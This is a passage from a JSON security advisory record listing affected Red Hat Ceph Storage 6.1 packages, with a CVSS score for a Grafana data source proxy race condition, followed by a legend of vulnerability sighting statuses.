"9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-resource-agents-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:cephadm-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:cephadm-ansible-1:2.18.0-1.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:cephadm-ansible-1:2.18.0-1.el9cp.src", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:cephfs-top-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.x86_64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "9Base-RHCEPH-6.1-Tools:ceph-2:17.2.6-167.el9cp.src", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mib-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-resource-agents-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:cephadm-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:cephadm-ansible-1:2.18.0-1.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:cephadm-ansible-1:2.18.0-1.el9cp.src", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:cephfs-top-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "grafana: data source proxy race condition" } ] }
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.